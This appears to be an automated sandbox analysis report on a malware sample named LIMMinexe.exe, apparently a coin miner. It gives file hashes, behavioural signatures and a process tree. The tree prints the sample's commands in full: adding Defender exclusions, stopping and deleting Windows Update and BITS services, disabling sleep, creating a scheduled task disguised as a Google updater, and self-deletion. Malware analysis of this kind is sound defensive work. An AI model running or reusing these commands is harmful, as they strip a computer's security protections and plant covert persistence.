Analysis
-
max time kernel
31s -
max time network
34s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
01-07-2023 07:12
Static task
static1
Behavioral task
behavioral1
Sample
LIMMinexe.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
LIMMinexe.exe
Resource
win10v2004-20230621-en
General
-
Target
LIMMinexe.exe
-
Size
3.6MB
-
MD5
d0525e69e54066d5b3764acefd16a754
-
SHA1
513304e7eca83acedad4655a135a6f4c2c1f4aed
-
SHA256
d700f47bdc52906c398c026b3ac69382fb012434f7a6967323ede937af1658ce
-
SHA512
b958797b913b1860daa2cdf4f6741835042e170fea4c4b5f3ae61432a9e24054dbcd40dbc4871d19b12d3f40d90523490caa37e6152d66850c05f18b7d738f03
-
SSDEEP
98304:vKNU8zvQiW+xPSCcgu3ebV6GDRjar2H2wKr3:avhWXrycG1jamKr3
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
Processes:
LIMMinexe.exedescription pid Process procid_target PID 112 created 1320 112 LIMMinexe.exe 13 PID 112 created 1320 112 LIMMinexe.exe 13 PID 112 created 1320 112 LIMMinexe.exe 13 PID 112 created 1320 112 LIMMinexe.exe 13 PID 112 created 1320 112 LIMMinexe.exe 13 -
Drops file in Drivers directory 1 IoCs
Processes:
LIMMinexe.exedescription ioc Process File created C:\Windows\System32\drivers\etc\hosts LIMMinexe.exe -
Stops running service(s) 3 TTPs
-
Deletes itself 1 IoCs
Processes:
cmd.exepid Process 428 cmd.exe -
Drops file in System32 directory 2 IoCs
Processes:
powershell.exepowershell.exedescription ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid Process 1344 sc.exe 1044 sc.exe 1936 sc.exe 700 sc.exe 1420 sc.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
LIMMinexe.exepowershell.exepowershell.exepid Process 112 LIMMinexe.exe 112 LIMMinexe.exe 1600 powershell.exe 112 LIMMinexe.exe 112 LIMMinexe.exe 112 LIMMinexe.exe 112 LIMMinexe.exe 112 LIMMinexe.exe 112 LIMMinexe.exe 952 powershell.exe 112 LIMMinexe.exe 112 LIMMinexe.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exedescription pid Process Token: SeDebugPrivilege 1600 powershell.exe Token: SeDebugPrivilege 952 powershell.exe Token: SeShutdownPrivilege 1928 powercfg.exe Token: SeShutdownPrivilege 1516 powercfg.exe Token: SeShutdownPrivilege 1316 powercfg.exe Token: SeShutdownPrivilege 1548 powercfg.exe -
Suspicious use of WriteProcessMemory 48 IoCs
Processes:
cmd.execmd.exepowershell.execmd.exedescription pid Process procid_target PID 1880 wrote to memory of 1420 1880 cmd.exe 36 PID 1880 wrote to memory of 1420 1880 cmd.exe 36 PID 1880 wrote to memory of 1420 1880 cmd.exe 36 PID 1880 wrote to memory of 1344 1880 cmd.exe 37 PID 1880 wrote to memory of 1344 1880 cmd.exe 37 PID 1880 wrote to memory of 1344 1880 cmd.exe 37 PID 1880 wrote to memory of 1044 1880 cmd.exe 38 PID 1880 wrote to memory of 1044 1880 cmd.exe 38 PID 1880 wrote to memory of 1044 1880 cmd.exe 38 PID 1880 wrote to memory of 1936 1880 cmd.exe 39 PID 1880 wrote to memory of 1936 1880 cmd.exe 39 PID 1880 wrote to memory of 1936 1880 cmd.exe 39 PID 1880 wrote to memory of 700 1880 cmd.exe 40 PID 1880 wrote to memory of 700 1880 cmd.exe 40 PID 1880 wrote to memory of 700 1880 cmd.exe 40 PID 1880 wrote to memory of 480 1880 cmd.exe 41 PID 1880 wrote to memory of 480 1880 cmd.exe 41 PID 1880 wrote to memory of 480 1880 cmd.exe 41 PID 1880 wrote to memory of 1968 1880 cmd.exe 42 PID 1880 wrote to memory of 1968 1880 cmd.exe 42 PID 1880 wrote to memory of 1968 1880 cmd.exe 42 PID 1880 wrote to memory of 1012 1880 cmd.exe 43 PID 1880 wrote to memory of 1012 1880 cmd.exe 43 PID 1880 wrote to memory of 1012 1880 cmd.exe 43 PID 1880 wrote to memory of 240 1880 cmd.exe 44 PID 1880 wrote to memory of 240 1880 cmd.exe 44 PID 1880 wrote to memory of 240 1880 cmd.exe 44 PID 1880 wrote to memory of 528 1880 cmd.exe 45 PID 1880 wrote to memory of 528 1880 cmd.exe 45 PID 1880 wrote to memory of 528 1880 cmd.exe 45 PID 280 wrote to memory of 1928 280 cmd.exe 46 PID 280 wrote to memory of 1928 280 cmd.exe 46 PID 280 wrote to memory of 1928 280 cmd.exe 46 PID 952 wrote to memory of 688 952 powershell.exe 47 PID 952 wrote to memory of 688 952 powershell.exe 47 PID 952 wrote to memory of 688 952 powershell.exe 47 PID 280 wrote to memory of 1516 280 cmd.exe 48 PID 280 wrote to memory of 1516 280 cmd.exe 48 PID 280 wrote to memory of 1516 280 cmd.exe 48 PID 280 wrote to memory of 1316 280 cmd.exe 49 PID 280 wrote to memory of 1316 280 cmd.exe 49 PID 280 wrote to memory of 1316 280 cmd.exe 49 PID 280 wrote to memory of 1548 280 cmd.exe 50 PID 280 wrote to memory of 1548 280 cmd.exe 50 PID 280 wrote to memory of 1548 280 cmd.exe 50 PID 428 wrote to memory of 292 428 cmd.exe 53 PID 428 wrote to memory of 292 428 cmd.exe 53 PID 428 wrote to memory of 292 428 cmd.exe 53 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:1320
-
C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe"C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
PID:112
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1600
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1420
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1344
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1044
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:1936
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:700
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:480
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1968
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1012
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:240
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:528
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
PID:280 -
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1928
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1516
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1316
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:1548
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#uwjcnslmt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Users\Admin\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Users\Admin\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:952 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn GoogleUpdateTaskMachineQC /tr 'C:\Users\Admin\Google\Chrome\updater.exe'3⤵
- Creates scheduled task(s)
PID:688
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\LIMMinexe.exe"2⤵
- Deletes itself
- Suspicious use of WriteProcessMemory
PID:428 -
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 33⤵PID:292
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\4VSDDC93382EJQ94AYA8.temp
Filesize7KB
MD524780bd2c4c2ee0ed68ecd309abbf7d1
SHA1487431fb449b698a5932bd862fc19f04c927a59a
SHA25636648787e282bb1f247f199bad92749566250bb5a1944e6a0af58da6f0da1247
SHA5129818fa88bb2f4f530fa2799a9ce5eb1406283bbe10b06ff53bf293d980106e7ffd0815ee7b0ea2b96dee00fd278449b641f3a7ddbacbd913cff0835da85eb65d
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD524780bd2c4c2ee0ed68ecd309abbf7d1
SHA1487431fb449b698a5932bd862fc19f04c927a59a
SHA25636648787e282bb1f247f199bad92749566250bb5a1944e6a0af58da6f0da1247
SHA5129818fa88bb2f4f530fa2799a9ce5eb1406283bbe10b06ff53bf293d980106e7ffd0815ee7b0ea2b96dee00fd278449b641f3a7ddbacbd913cff0835da85eb65d